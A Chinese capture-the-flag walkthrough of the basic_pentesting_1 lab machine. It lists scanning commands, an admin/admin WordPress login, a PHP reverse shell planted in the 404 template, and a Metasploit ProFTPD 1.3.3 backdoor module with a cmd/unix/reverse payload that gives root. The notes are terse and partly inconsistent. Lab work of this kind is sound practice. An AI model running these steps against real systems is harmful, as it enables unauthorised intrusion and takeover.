靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
大小曲奇(´ε` )1 小时前
使用安全继电器的急停电路设计
安全
go_to_hacker2 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
EasyDSS4 小时前
视频监控从安装到优化的技术指南,视频汇聚系统EasyCVR智能安防系统构建之道
大数据·网络·网络协议·音视频
rufeike5 小时前
UDP协议理解
网络·网络协议·udp
江理不变情6 小时前
海思ISP调试记录
网络·接口隔离原则
网络安全工程师老王6 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试
世界尽头与你6 小时前
【安全扫描器原理】网络扫描算法
网络·安全
AI拉呱_6 小时前
医院行业等保2.0案例
安全·web安全
GKoSon6 小时前
加入RPC shell指令 温箱长时间监控
网络·网络协议·rpc
hgdlip7 小时前
关闭IP属地显示会影响账号的正常使用吗
网络·网络协议·tcp/ip·ip属地